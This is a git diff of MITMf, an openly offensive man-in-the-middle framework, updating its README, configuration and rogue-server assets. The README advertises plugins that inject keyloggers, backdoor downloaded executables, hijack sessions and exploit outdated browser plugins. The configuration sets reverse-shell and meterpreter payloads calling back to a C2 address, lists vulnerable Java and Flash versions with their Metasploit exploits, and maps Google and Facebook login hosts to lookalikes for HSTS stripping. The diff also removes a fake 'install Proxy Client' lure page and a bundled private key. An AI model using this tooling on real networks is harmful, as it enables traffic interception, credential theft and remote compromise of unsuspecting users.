diff --git a/.gitmodules b/.gitmodules
index ca49b01..65a6dc5 100644
--- a/.gitmodules
+++ b/.gitmodules
@@ -1,12 +1,3 @@
[submodule "libs/bdfactory"]
path = libs/bdfactory
url = https://github.com/secretsquirrel/the-backdoor-factory
-[submodule "libs/responder"]
- path = libs/responder
- url = https://github.com/byt3bl33d3r/Responder-MITMf
-[submodule "core/beefapi"]
- path = core/beefapi
- url = https://github.com/byt3bl33d3r/beefapi
-[submodule "libs/dnschef"]
- path = libs/dnschef
- url = https://github.com/byt3bl33d3r/dnschef
diff --git a/README.md b/README.md
index 913c640..7b03c09 100644
--- a/README.md
+++ b/README.md
@@ -1,4 +1,4 @@
-MITMf V0.9.6
+MITMf V0.9.7
============
Framework for Man-In-The-Middle attacks
@@ -7,61 +7,57 @@ Quick tutorials, examples and dev updates at http://sign0f4.blogspot.it
This tool is based on [sergio-proxy](https://github.com/supernothing/sergio-proxy) and is an attempt to revive and update the project.
-**Before submitting issues please read the appropriate [section](#submitting-issues).**
+Contact me at:
+- Twitter: @byt3bl33d3r
+- IRC on Freenode: #MITMf
+- Email: byt3bl33d3r@gmail.com
-(Another) Dependency change!
-============================
-As of v0.9.6, the fork of the ```python-netfilterqueue``` library is no longer required.
+**Before submitting issues please read the [FAQ](#faq) and the appropriate [section](#submitting-issues).**
-Installation
-============
-If MITMf is not in your distros repo or you just want the latest version:
-- clone this repository
-- run the ```setup.sh``` script
-- run the command ```pip install -r requirements.txt``` to install all python dependencies
-
-On Kali Linux, if you get an error while installing the pypcap package or when starting MITMf you see: ```ImportError: no module named pcap``` run ```apt-get install python-pypcap``` to fix it.
-
-Availible plugins
+Available plugins
=================
-- Responder - LLMNR, NBT-NS and MDNS poisoner
-- SSLstrip+ - Partially bypass HSTS
-- Spoof - Redirect traffic using ARP Spoofing, ICMP Redirects or DHCP Spoofing and modify DNS queries
-- Sniffer - Sniffs for various protocol login and auth attempts
-- BeEFAutorun - Autoruns BeEF modules based on clients OS or browser type
-- AppCachePoison - Perform app cache poison attacks
-- SessionHijacking - Performs session hijacking attacks, and stores cookies in a firefox profile
-- BrowserProfiler - Attempts to enumerate all browser plugins of connected clients
-- CacheKill - Kills page caching by modifying headers
-- FilePwn - Backdoor executables being sent over http using bdfactory
-- Inject - Inject arbitrary content into HTML content
-- JavaPwn - Performs drive-by attacks on clients with out-of-date java browser plugins
-- jskeylogger - Injects a javascript keylogger into clients webpages
-- Replace - Replace arbitary content in HTML content
-- SMBAuth - Evoke SMB challenge-response auth attempts
-- Upsidedownternet - Flips images 180 degrees
+- ```Screenshotter``` - Uses HTML5 Canvas to render an accurate screenshot of a clients browser
+- ```Responder``` - LLMNR, NBT-NS, WPAD and MDNS poisoner
+- ```SSLstrip+``` - Partially bypass HSTS
+- ```Spoof``` - Redirect traffic using ARP Spoofing, ICMP Redirects or DHCP Spoofing
+- ```BeEFAutorun``` - Autoruns BeEF modules based on clients OS or browser type
+- ```AppCachePoison``` - Perform App cache poisoning attacks
+- ```Ferret-NG``` - Tranperently hijacks sessions
+- ```BrowserProfiler``` - Attempts to enumerate all browser plugins of connected clients
+- ```CacheKill``` - Kills page caching by modifying headers
+- ```FilePwn``` - Backdoor executables being sent over HTTP using the Backdoor Factory and BDFProxy
+- ```Inject``` - Inject arbitrary content into HTML content
+- ```BrowserPwn``` - Performs drive-by attacks on clients with out-of-date browser plugins
+- ```jskeylogger``` - Injects a javascript keylogger into clients webpages
+- ```Replace``` - Replace arbitary content in HTML content
+- ```SMBAuth``` - Evoke SMB challenge-response auth attempts
+- ```Upsidedownternet``` - Flips images 180 degrees
Changelog
=========
+- ```SessionHijacker``` is replaced with ```Ferret-NG```, captures cookies and starts a proxy that will feed them to connected clients
+
+- Addition of the ```Screenshotter``` plugin, able to render screenshots of a clients browser at regular intervals
+
+- Addition of a fully functional SMB server using the [Impacket](https://github.com/CoreSecurity/impacket) library
+
- Addition of [DNSChef](https://github.com/iphelix/dnschef), the framework is now a IPv4/IPv6 (TCP & UDP) DNS server ! Supported queries are: 'A', 'AAAA', 'MX', 'PTR', 'NS', 'CNAME', 'TXT', 'SOA', 'NAPTR', 'SRV', 'DNSKEY' and 'RRSIG'
-- Addition of the Sniffer plugin which integrates [Net-Creds](https://github.com/DanMcInerney/net-creds) currently supported protocols are:
+- Integrated [Net-Creds](https://github.com/DanMcInerney/net-creds) currently supported protocols are:
FTP, IRC, POP, IMAP, Telnet, SMTP, SNMP (community strings), NTLMv1/v2 (all supported protocols like HTTP, SMB, LDAP etc..) and Kerberos
- Integrated [Responder](https://github.com/SpiderLabs/Responder) to poison LLMNR, NBT-NS and MDNS, and act as a WPAD rogue server.
- Integrated [SSLstrip+](https://github.com/LeonardoNve/sslstrip2) by Leonardo Nve to partially bypass HSTS as demonstrated at BlackHat Asia 2014
-- Addition of the SessionHijacking plugin, which uses code from [FireLamb](https://github.com/sensepost/mana/tree/master/firelamb) to store cookies in a Firefox profile
+- ```Spoof``` plugin can now exploit the 'ShellShock' bug when DHCP spoofing!
-- Spoof plugin can now exploit the 'ShellShock' bug when DHCP spoofing!
-
-- Spoof plugin now supports ICMP, ARP and DHCP spoofing
+- ```Spoof``` plugin now supports ICMP, ARP and DHCP spoofing
- Usage of third party tools has been completely removed (e.g. ettercap)
-- FilePwn plugin re-written to backdoor executables and zip files on the fly by using [the-backdoor-factory](https://github.com/secretsquirrel/the-backdoor-factory) and code from [BDFProxy](https://github.com/secretsquirrel/BDFProxy)
+- ```FilePwn```plugin re-written to backdoor executables zip and tar files on the fly by using [the-backdoor-factory](https://github.com/secretsquirrel/the-backdoor-factory) and code from [BDFProxy](https://github.com/secretsquirrel/BDFProxy)
- Added [msfrpc.py](https://github.com/byt3bl33d3r/msfrpc/blob/master/python-msfrpc/msfrpc.py) for interfacing with Metasploits rpc server
@@ -69,18 +65,52 @@ Changelog
- Addition of the app-cache poisoning attack by [Krzysztof Kotowicz](https://github.com/koto/sslstrip) (blogpost explaining the attack here http://blog.kotowicz.net/2010/12/squid-imposter-phishing-websites.html)
-Submitting Issues
-=================
-If you have *questions* regarding the framework please email me at byt3bl33d3r@gmail.com
-
-If you find a *bug* please open an issue and include at least the following in the description:
-
-- Full command string you used
-- OS your using
-
-Also remember: Github markdown is your friend!
-
How to install on Kali
======================
```apt-get install mitmf```
+
+**Currently Kali has a very old version of MITMf in it's repos, read the [Installation](#installation) section to get the latest version**
+
+Installation
+============
+If MITMf is not in your distros repo or you just want the latest version:
+- Clone this repository
+- Run the ```setup.sh``` script
+- Run the command ```pip install -r requirements.txt``` to install all python dependencies
+
+On Kali Linux, if you get an error while installing the ```pypcap``` package or when starting MITMf you see: ```ImportError: no module named pcap``` run ```apt-get install python-pypcap``` to fix it.
+
+Submitting Issues
+=================
+If you have *questions* regarding the framework please email me at byt3bl33d3r@gmail.com
+
+**Only submit issues if you find a bug in the latest version of the framework.**
+
+When inevitably you do come across sed *bug*, please open an issue and include at least the following in the description:
+
+- Full command string you used
+- OS your using
+- Full error traceback (If any)
+
+Also remember: Github markdown is your friend!
+
+FAQ
+===
+- **Is Windows supported?**
+- No
+
+- **Is OSX supported?**
+- Currently no, although with some tweaking (which I'll probably get around to in the near future) it should be able to run perfectly on OSX
+
+- **I can't install package X because of an error!**
+- Try installing the package via ```pip``` or your distros package manager. This *isn't* a problem with MITMf.
+
+- **How do I install package X?**
+- Please read the [installation](#installation) guide.
+
+- **I get an ImportError when launching MITMf!**
+- Please read the [installation](#installation) guide.
+
+- **Dude, no documentation/video tutorials?**
+- Currently no, once the framework hits 1.0 I'll probably start writing/making some.
diff --git a/config/mitmf.conf b/config/mitmf.conf
index f1f5b32..c6a4269 100644
--- a/config/mitmf.conf
+++ b/config/mitmf.conf
@@ -18,9 +18,19 @@
pass = beef
[[Metasploit]]
- msfport = 8080 #Port to start webserver for exploits
+
+ msfport = 8080 #Port to start Metasploit's webserver on that will host exploits
rpcip = 127.0.0.1
rpcpass = abc123
+
+ [[SMB]]
+
+ #
+ #Here you can configure MITMf's internal SMB server
+ #
+
+ #Set a custom challenge
+ Challenge = 1122334455667788
[[DNS]]
@@ -28,7 +38,6 @@
#Here you can configure MITMf's internal DNS server
#
- resolver = dnschef #Can be set to 'twisted' or 'dnschef' ('dnschef' is highly reccomended)
tcp = Off #Use the TCP DNS proxy instead of the default UDP (not fully tested, might break stuff!)
port = 53 #Port to listen on
ipv6 = Off #Run in IPv6 mode (not fully tested, might break stuff!)
@@ -40,7 +49,7 @@
nameservers = 8.8.8.8
[[[A]]] # Queries for IPv4 address records
- *.thesprawl.org=192.0.2.1
+ *.thesprawls.org=192.0.2.1
[[[AAAA]]] # Queries for IPv6 address records
*.thesprawl.org=2001:db8::1
@@ -86,62 +95,63 @@
subnet = 255.255.255.0
dns_server = 192.168.2.20 #optional
+[Replace]
+
+ [[Regex1]]
+ 'Google Search' = 'Google In My Pants'
+
+ [[Regex2]]
+ "I'm Feeling Lucky" = "I'm Feeling Something In My Pants"
+
+[Ferret-NG]
+ #
+ # Here you can specify the client to hijack sessions from
+ #
+
+ Client = '192.168.20.126'
+
+[SSLstrip+]
+
+ #
+ #Here you can configure your domains to bypass HSTS on, the format is real.domain.com = fake.domain.com
+ #
+
+ #for google and gmail
+ accounts.google.com = account.google.com
+ mail.google.com = gmail.google.com
+ accounts.google.se = cuentas.google.se
+
+ #for facebook
+ www.facebook.com = social.facebook.com
+
[Responder]
#Set these values to On or Off, so you can control which rogue authentication server is turned on.
- SQL = On
- SMB = On
+ MSSQL = On
Kerberos = On
- FTP = On
- POP = On
- ##Listen on 25/TCP, 587/TCP
- SMTP = On
- IMAP = On
- HTTP = On
- HTTPS = On
- LDAP = On
+ FTP = On
+ POP = On
+ SMTP = On #Listens on 25/TCP, 587/TCP
+ IMAP = On
+ LDAP = On
- #Set a custom challenge
- Challenge = 1122334455667788
-
- #Set this to change the default logging file
- SessionLog = Responder-Session.log
-
- #Set this option with your in-scope targets (default = All). Example: RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
- #RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
+ #Set this option with your in-scope targets (default = All)
+ #Ex. RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
RespondTo =
- #Set this option with specific NBT-NS/LLMNR names to answer to (default = All). Example: RespondTo = WPAD,DEV,PROD,SQLINT
- #RespondTo = WPAD,DEV,PROD,SQLINT
+
+ #Set this option with specific NBT-NS/LLMNR names to answer to (default = All)
+ #Ex. RespondTo = WPAD,DEV,PROD,SQLINT
RespondToName =
#DontRespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
DontRespondTo =
- #Set this option with specific NBT-NS/LLMNR names not to respond to (default = None). Example: DontRespondTo = NAC, IPS, IDS
+
+ #Set this option with specific NBT-NS/LLMNR names not to respond to (default = None)
+ #Ex. DontRespondTo = NAC, IPS, IDS
DontRespondToName =
- [[HTTP Server]]
-
- #Set this to On if you want to always serve a specific file to the victim.
- Serve-Always = Off
-
- #Set this to On if you want to serve an executable file each time a .exe is detected in an URL.
- Serve-Exe = Off
-
- #Uncomment and specify a custom file to serve, the file must exist.
- Filename = config/responder/Denied.html
-
- #Specify a custom executable file to serve, the file must exist.
- ExecFilename = config/responder/FixInternet.exe
-
- #Set your custom PAC script
- WPADScript = 'function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return "PROXY ISAProxySrv:3141; DIRECT";}'
-
- [[HTTPS Server]]
-
- #Change to use your certs
- cert = config/responder/certs/responder.crt
- key = config/responder/certs/responder.key
-
+ #Set your custom PAC script
+ WPADScript = 'function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return "PROXY ISAProxySrv:3141; DIRECT";}'
[BeEFAutorun]
#Example config for the BeefAutorun plugin
@@ -243,51 +253,90 @@
skip_in_mass_poison=1
#you can add other scripts in additional sections like jQuery etc.
-[JavaPwn]
+[BrowserSniper]
+ #
+ # Currently only supports java, flash and browser exploits
+ #
+ # The version strings were pulled from http://www.cvedetails.com
+ #
+ # When adding java exploits remember the following format: version string (eg 1.6.0) + update version (eg 28) = 1.6.0.28
+ #
- #
- # All versions strings without a * are considered vulnerable if clients Java version is <= update version
- # When adding more exploits remember the following format: version string (eg 1.6.0) + update version (eg 28) = 1.6.0.28
- #
+ [[multi/browser/java_rhino]] #Exploit's MSF path
+
+ Type = PluginVuln #Can be set to PluginVuln, BrowserVuln
+ OS = Any #Can be set to Any, Windows or Windows + version (e.g Windows 8.1)
- [[Multi]] #Cross platform exploits, yay java! <3
+ Browser = Any #Can be set to Any, Chrome, Firefox, IE or browser + version (e.g IE 6)
+ Plugin = Java #Can be set to Java, Flash (if Type is BrowserVuln will be ignored)
- multi/browser/java_rhino = 1.6.0.28, 1.7.0.28
- multi/browser/java_calendar_deserialize = 1.6.0.10, 1.5.0.16
- multi/browser/java_getsoundbank_bof = 1.6.0.16, 1.5.0.21, 1.4.2.23, 1.3.1.26
- multi/browser/java_atomicreferencearray = 1.6.0.30, 1.5.0.33, 1.7.0.2
- multi/browser/java_jre17_exec = 1.7.0.6
- multi/browser/java_jre17_jaxws = 1.7.0.7
- multi/browser/java_jre17_jmxbean = 1.7.0.10
- multi/browser/java_jre17_jmxbean_2 = 1.7.0.11
- multi/browser/java_jre17_reflection_types = 1.7.0.17
- multi/browser/java_verifier_field_access = 1.7.0.4, 1.6.0.32, 1.5.0.35, 1.4.2.37
- multi/browser/java_jre17_glassfish_averagerangestatisticimpl = 1.7.0.7
- multi/browser/java_jre17_method_handle = 1.7.0.7
- multi/browser/java_jre17_driver_manager = 1.7.0.17
- multi/browser/java_jre17_provider_skeleton = 1.7.0.21
- multi/browser/java_storeimagearray = 1.7.0.21
- multi/browser/java_setdifficm_bof = *1.6.0.16, *1.6.0.11
+ #An exact list of the plugin versions affected (if Type is BrowserVuln will be ignored)
+ PluginVersions = 1.6.0, 1.6.0.1, 1.6.0.10, 1.6.0.11, 1.6.0.12, 1.6.0.13, 1.6.0.14, 1.6.0.15, 1.6.0.16, 1.6.0.17, 1.6.0.18, 1.6.0.19, 1.6.0.2, 1.6.0.20, 1.6.0.21, 1.6.0.22, 1.6.0.23, 1.6.0.24, 1.6.0.25, 1.6.0.26, 1.6.0.27, 1.6.0.3, 1.6.0.4, 1.6.0.5, 1.6.0.6, 1.6.0.7, 1.7.0
- [[Windows]] #These are windows specific
+ [[multi/browser/java_atomicreferencearray]]
- windows/browser/java_ws_double_quote = 1.6.0.35, 1.7.0.7
- windows/browser/java_cmm = 1.6.0.41, 1.7.0.15
- windows/browser/java_mixer_sequencer = 1.6.0.18
+ Type = PluginVuln
+ OS = Any
+ Browser = Any
+ Plugin = Java
+ PluginVersions = 1.5.0, 1.5.0.1, 1.5.0.10, 1.5.0.11, 1.5.0.12, 1.5.0.13, 1.5.0.14, 1.5.0.15, 1.5.0.16, 1.5.0.17, 1.5.0.18, 1.5.0.19, 1.5.0.2, 1.5.0.20, 1.5.0.21, 1.5.0.22, 1.5.0.23, 1.5.0.24, 1.5.0.25, 1.5.0.26, 1.5.0.27, 1.5.0.28, 1.5.0.29, 1.5.0.3, 1.5.0.31, 1.5.0.33, 1.5.0.4, 1.5.0.5, 1.5.0.6, 1.5.0.7, 1.5.0.8, 1.5.0.9, 1.6.0, 1.6.0.1, 1.6.0.10, 1.6.0.11, 1.6.0.12, 1.6.0.13, 1.6.0.14, 1.6.0.15, 1.6.0.16, 1.6.0.17, 1.6.0.18, 1.6.0.19, 1.6.0.2, 1.6.0.20, 1.6.0.21, 1.6.0.22, 1.6.0.24, 1.6.0.25, 1.6.0.26, 1.6.0.27, 1.6.0.29, 1.6.0.3, 1.6.0.30, 1.6.0.4, 1.6.0.5, 1.6.0.6, 1.6.0.7, 1.7.0, 1.7.0.1, 1.7.0.2
-[SSLstrip+]
+ [[multi/browser/java_jre17_jmxbean_2]]
+
+ Type = PluginVuln
+ OS = Any
+ Browser = Any
+ Plugin = Java
+ PluginVersions = 1.7.0, 1.7.0.1, 1.7.0.10, 1.7.0.11, 1.7.0.2, 1.7.0.3, 1.7.0.4, 1.7.0.5, 1.7.0.6, 1.7.0.7, 1.7.0.9
- #
- #Here you can configure your domains to bypass HSTS on, the format is real.domain.com = fake.domain.com
- #
+ [[multi/browser/java_jre17_reflection_types]]
- #for google and gmail
- accounts.google.com = account.google.com
- mail.google.com = gmail.google.com
- accounts.google.se = cuentas.google.se
+ Type = PluginVuln
+ OS = Any
+ Browser = Any
+ Plugin = Java
+ PluginVersions = 1.7.0, 1.7.0.1, 1.7.0.10, 1.7.0.11, 1.7.0.13, 1.7.0.15, 1.7.0.17, 1.7.0.2, 1.7.0.3, 1.7.0.4, 1.7.0.5, 1.7.0.6, 1.7.0.7, 1.7.0.9
+
+ [[multi/browser/java_verifier_field_access]]
- #for facebook
- www.facebook.com = social.facebook.com
+ Type = PluginVuln
+ OS = Any
+ Browser = Any
+ Plugin = Java
+ PluginVersions = 1.4.2.37, 1.5.0.35, 1.6.0.32, 1.7.0.4
+
+ [[multi/browser/java_jre17_provider_skeleton]]
+
+ Type = PluginVuln
+ OS = Any
+ Browser = Any
+ Plugin = Java
+ PluginVersions = 1.7.0, 1.7.0.1, 1.7.0.10, 1.7.0.11, 1.7.0.13, 1.7.0.15, 1.7.0.17, 1.7.0.2, 1.7.0.21, 1.7.0.3, 1.7.0.4, 1.7.0.5, 1.7.0.6, 1.7.0.7, 1.7.0.9
+
+
+ [[exploit/windows/browser/adobe_flash_pcre]]
+
+ Type = PluginVuln
+ OS = Windows
+ Browser = Any
+ Plugin = Flash
+ PluginVersions = 11.2.202.440, 13.0.0.264, 14.0.0.125, 14.0.0.145, 14.0.0.176, 14.0.0.179, 15.0.0.152, 15.0.0.167, 15.0.0.189, 15.0.0.223, 15.0.0.239, 15.0.0.246, 16.0.0.235, 16.0.0.257, 16.0.0.287, 16.0.0.296
+
+ [[exploit/windows/browser/adobe_flash_net_connection_confusion]]
+
+ Type = PluginVuln
+ OS = Windows
+ Browser = Any
+ Plugin = Flash
+ PluginVersions = 13.0.0.264, 14.0.0.125, 14.0.0.145, 14.0.0.176, 14.0.0.179, 15.0.0.152, 15.0.0.167, 15.0.0.189, 15.0.0.223, 15.0.0.239, 15.0.0.246, 16.0.0.235, 16.0.0.257, 16.0.0.287, 16.0.0.296, 16.0.0.305
+
+ [[exploit/windows/browser/adobe_flash_copy_pixels_to_byte_array]]
+
+ Type = PluginVuln
+ OS = Windows
+ Browser = Any
+ Plugin = Flash
+ PluginVersions = 11.2.202.223, 11.2.202.228, 11.2.202.233, 11.2.202.235, 11.2.202.236, 11.2.202.238, 11.2.202.243, 11.2.202.251, 11.2.202.258, 11.2.202.261, 11.2.202.262, 11.2.202.270, 11.2.202.273,11.2.202.275, 11.2.202.280, 11.2.202.285, 11.2.202.291, 11.2.202.297, 11.2.202.310, 11.2.202.332, 11.2.202.335, 11.2.202.336, 11.2.202.341, 11.2.202.346, 11.2.202.350, 11.2.202.356, 11.2.202.359, 11.2.202.378, 11.2.202.394, 11.2.202.400, 13.0.0.111, 13.0.0.182, 13.0.0.201, 13.0.0.206, 13.0.0.214, 13.0.0.223, 13.0.0.231, 13.0.0.241, 13.0.0.83, 14.0.0.110, 14.0.0.125, 14.0.0.137, 14.0.0.145, 14.0.0.176, 14.0.0.178, 14.0.0.179, 15.0.0.144
[FilePwn]
@@ -327,91 +376,93 @@
# Tested on Kali-Linux.
[[ZIP]]
- # patchCount is the max number of files to patch in a zip file
- # After the max is reached it will bypass the rest of the files
- # and send on it's way
+ # patchCount is the max number of files to patch in a zip file
+ # After the max is reached it will bypass the rest of the files
+ # and send on it's way
- patchCount = 5
+ patchCount = 5
- # In Bytes
- maxSize = 40000000
+ # In Bytes
+ maxSize = 40000000
- blacklist = .dll, #don't do dlls in a zip file
+ blacklist = .dll, #don't do dlls in a zip file
[[TAR]]
- # patchCount is the max number of files to patch in a tar file
- # After the max is reached it will bypass the rest of the files
- # and send on it's way
+ # patchCount is the max number of files to patch in a tar file
+ # After the max is reached it will bypass the rest of the files
+ # and send on it's way
- patchCount = 5
+ patchCount = 5
- # In Bytes
- maxSize = 40000000
+ # In Bytes
+ maxSize = 40000000
- blacklist = , # a comma is null do not leave blank
+ blacklist = , # a comma is null do not leave blank
[[targets]]
#MAKE SURE that your settings for host and port DO NOT
# overlap between different types of payloads
[[[ALL]]] # DEFAULT settings for all targets REQUIRED
-
- LinuxType = ALL # choices: x86/x64/ALL/None
- WindowsType = ALL # choices: x86/x64/ALL/None
- FatPriority = x64 # choices: x86 or x64
-
- FileSizeMax = 60000000 # ~60 MB (just under) No patching of files this large
- CompressedFiles = True #True/False
+ LinuxType = ALL # choices: x86/x64/ALL/None
+ WindowsType = ALL # choices: x86/x64/ALL/None
+ FatPriority = x64 # choices: x86 or x64
- [[[[LinuxIntelx86]]]]
- SHELL = reverse_shell_tcp # This is the BDF syntax
- HOST = 192.168.1.168 # The C2
- PORT = 8888
- SUPPLIED_SHELLCODE = None
- MSFPAYLOAD = linux/x86/shell_reverse_tcp # MSF syntax
-
- [[[[LinuxIntelx64]]]]
- SHELL = reverse_shell_tcp
- HOST = 192.168.1.16
- PORT = 9999
- SUPPLIED_SHELLCODE = None
- MSFPAYLOAD = linux/x64/shell_reverse_tcp
+ FileSizeMax = 60000000 # ~60 MB (just under) No patching of files this large
- [[[[WindowsIntelx86]]]]
- PATCH_TYPE = SINGLE #JUMP/SINGLE/APPEND
- # PATCH_METHOD overwrites PATCH_TYPE with jump
- PATCH_METHOD = automatic
- HOST = 192.168.1.16
- PORT = 8443
- SHELL = iat_reverse_tcp_stager_threaded
- SUPPLIED_SHELLCODE = None
- ZERO_CERT = False
- PATCH_DLL = True
- MSFPAYLOAD = windows/meterpreter/reverse_tcp
+ CompressedFiles = True #True/False
+
+ [[[[LinuxIntelx86]]]]
+ SHELL = reverse_shell_tcp # This is the BDF syntax
+ HOST = 192.168.1.168 # The C2
+ PORT = 8888
+ SUPPLIED_SHELLCODE = None
+ MSFPAYLOAD = linux/x86/shell_reverse_tcp # MSF syntax
+
+ [[[[LinuxIntelx64]]]]
+ SHELL = reverse_shell_tcp
+ HOST = 192.168.1.16
+ PORT = 9999
+ SUPPLIED_SHELLCODE = None
+ MSFPAYLOAD = linux/x64/shell_reverse_tcp
- [[[[WindowsIntelx64]]]]
- PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
- # PATCH_METHOD overwrites PATCH_TYPE with jump
- PATCH_METHOD = automatic
- HOST = 192.168.1.16
- PORT = 8088
- SHELL = iat_reverse_tcp_stager_threaded
- SUPPLIED_SHELLCODE = None
- ZERO_CERT = True
- PATCH_DLL = False
- MSFPAYLOAD = windows/x64/shell_reverse_tcp
+ [[[[WindowsIntelx86]]]]
+ PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
+ # PATCH_METHOD overwrites PATCH_TYPE with jump
+ # PATCH_METHOD = automatic
+ PATCH_METHOD =
+ HOST = 192.168.1.16
+ PORT = 8443
+ SHELL = iat_reverse_tcp_stager_threaded
+ SUPPLIED_SHELLCODE = None
+ ZERO_CERT = True
+ PATCH_DLL = False
+ MSFPAYLOAD = windows/meterpreter/reverse_tcp
- [[[[MachoIntelx86]]]]
- SHELL = reverse_shell_tcp
- HOST = 192.168.1.16
- PORT = 4444
- SUPPLIED_SHELLCODE = None
- MSFPAYLOAD = linux/x64/shell_reverse_tcp
+ [[[[WindowsIntelx64]]]]
+ PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
+ # PATCH_METHOD overwrites PATCH_TYPE with jump
+ # PATCH_METHOD = automatic
+ PATCH_METHOD =
+ HOST = 192.168.1.16
+ PORT = 8088
+ SHELL = iat_reverse_tcp_stager_threaded
+ SUPPLIED_SHELLCODE = None
+ ZERO_CERT = True
+ PATCH_DLL = False
+ MSFPAYLOAD = windows/x64/shell/reverse_tcp
- [[[[MachoIntelx64]]]]
- SHELL = reverse_shell_tcp
- HOST = 192.168.1.16
- PORT = 5555
- SUPPLIED_SHELLCODE = None
- MSFPAYLOAD = linux/x64/shell_reverse_tcp
\ No newline at end of file
+ [[[[MachoIntelx86]]]]
+ SHELL = reverse_shell_tcp
+ HOST = 192.168.1.16
+ PORT = 4444
+ SUPPLIED_SHELLCODE = None
+ MSFPAYLOAD = linux/x64/shell_reverse_tcp
+
+ [[[[MachoIntelx64]]]]
+ SHELL = reverse_shell_tcp
+ HOST = 192.168.1.16
+ PORT = 5555
+ SUPPLIED_SHELLCODE = None
+ MSFPAYLOAD = linux/x64/shell_reverse_tcp
diff --git a/config/responder/Denied.html b/config/responder/Denied.html
deleted file mode 100644
index d79f811..0000000
--- a/config/responder/Denied.html
+++ /dev/null
@@ -1,31 +0,0 @@
-
-
-Website Blocked: ISA Proxy Server
-
-
-
-
-
-
-
New Security Policy: Website Blocked
-
-
-
-
Access has been blocked. Please download and install the new Proxy Client in order to access internet resources.
-
-
-
-
-
-
-
-
diff --git a/config/responder/FixInternet.exe b/config/responder/FixInternet.exe
deleted file mode 100755
index b1a8e63..0000000
Binary files a/config/responder/FixInternet.exe and /dev/null differ
diff --git a/config/responder/certs/gen-self-signed-cert.sh b/config/responder/certs/gen-self-signed-cert.sh
deleted file mode 100755
index e9f3c73..0000000
--- a/config/responder/certs/gen-self-signed-cert.sh
+++ /dev/null
@@ -1,2 +0,0 @@
-#!/bin/bash
-openssl genrsa -des3 -out responder.tmp.key 2048&&openssl rsa -in responder.tmp.key -out responder.key&&openssl req -new -key responder.key -out responder.csr&&openssl x509 -req -days 365 -in responder.csr -signkey responder.key -out responder.crt&&rm responder.tmp.key responder.csr
diff --git a/config/responder/certs/responder.crt b/config/responder/certs/responder.crt
deleted file mode 100644
index ac239e8..0000000
--- a/config/responder/certs/responder.crt
+++ /dev/null
@@ -1,19 +0,0 @@
------BEGIN CERTIFICATE-----
-MIIDBjCCAe4CCQDDe8Sb2PGjITANBgkqhkiG9w0BAQUFADBFMQswCQYDVQQGEwJB
-VTETMBEGA1UECAwKU29tZS1TdGF0ZTEhMB8GA1UECgwYSW50ZXJuZXQgV2lkZ2l0
-cyBQdHkgTHRkMB4XDTEzMDIyODIwMTcxN1oXDTE0MDIyODIwMTcxN1owRTELMAkG
-A1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoMGEludGVybmV0
-IFdpZGdpdHMgUHR5IEx0ZDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEB
-AMQB5yErm0Sg7sRQbLgbi/hG/8uF2xUzvVKnT4LROEWkkimy9umb2JbvAZITDvSs
-r2xsPA4VoxFjKpWLOv7mAIMBR95NDWsTLuR36Sho/U2LlTlUBdSfQP7rlKQZ0L43
-YpXswdvCCJ0wP2yOhq0i71cg/Nk9mfQxftpgGUxoa+6ljU9hSdmThu2FVgAbSpNl
-D86rk4K9/sGYAY4btMqaMzC7JIKZp07FHL32oM01cKbRoNg2eUuQmoVjca1pkmbO
-Y8qnl7ajOjsiAPQnt/2TMJlRsdoU1fSx76Grgkm8D4gX/pBUqELdpvHtnm/9imPl
-qNGL5LaW8ARgG16U0mRhutkCAwEAATANBgkqhkiG9w0BAQUFAAOCAQEAS7u4LWc9
-wDPThD0o58Ti2GgIs+mMRx5hPaxWHJNCu+lwFqjvWmsNFfHoSzlIkIUjtlV2G/wE
-FxDSPlc/V+r7U2UiE7WSqQiWdmfOYS2m03x4SN0Vzf/n9DeApyPo2GsXGrha20eN
-s390Xwj6yKFdprUPJ8ezlEVRrAMv7tu1cOLzqmkocYKnPgXDdQxiiGisp7/hEUCQ
-B7HvNCMPbOi+M7O/CXbfgnTD029KkyiR2LEtj4QC5Ytp/pj0UyyoIeCK57CTB3Jt
-X3CZ+DiphTpOca4iENH55m6atk+WHYwg3ClYiONQDdIgKVT3BK0ITjyFWZeTneVu
-1eVgF/UkX9fqJg==
------END CERTIFICATE-----
diff --git a/config/responder/certs/responder.key b/config/responder/certs/responder.key
deleted file mode 100644
index 2b7cbc0..0000000
--- a/config/responder/certs/responder.key
+++ /dev/null
@@ -1,27 +0,0 @@
------BEGIN RSA PRIVATE KEY-----
-MIIEowIBAAKCAQEAxAHnISubRKDuxFBsuBuL+Eb/y4XbFTO9UqdPgtE4RaSSKbL2
-6ZvYlu8BkhMO9KyvbGw8DhWjEWMqlYs6/uYAgwFH3k0NaxMu5HfpKGj9TYuVOVQF
-1J9A/uuUpBnQvjdilezB28IInTA/bI6GrSLvVyD82T2Z9DF+2mAZTGhr7qWNT2FJ
-2ZOG7YVWABtKk2UPzquTgr3+wZgBjhu0ypozMLskgpmnTsUcvfagzTVwptGg2DZ5
-S5CahWNxrWmSZs5jyqeXtqM6OyIA9Ce3/ZMwmVGx2hTV9LHvoauCSbwPiBf+kFSo
-Qt2m8e2eb/2KY+Wo0YvktpbwBGAbXpTSZGG62QIDAQABAoIBABbuLg74XgLKXQSE
-cCOdvWM/Ux+JOlchpW1s+2VPeqjTFvJf6Hjt7YnCzkk7h41iQmeJxgDT0S7wjgPO
-tQkq+TZaSQEdvIshRGQgDxvWJIQU51E8ni4Ar4bjIpGMH5qROixV9VvzODTDdzgI
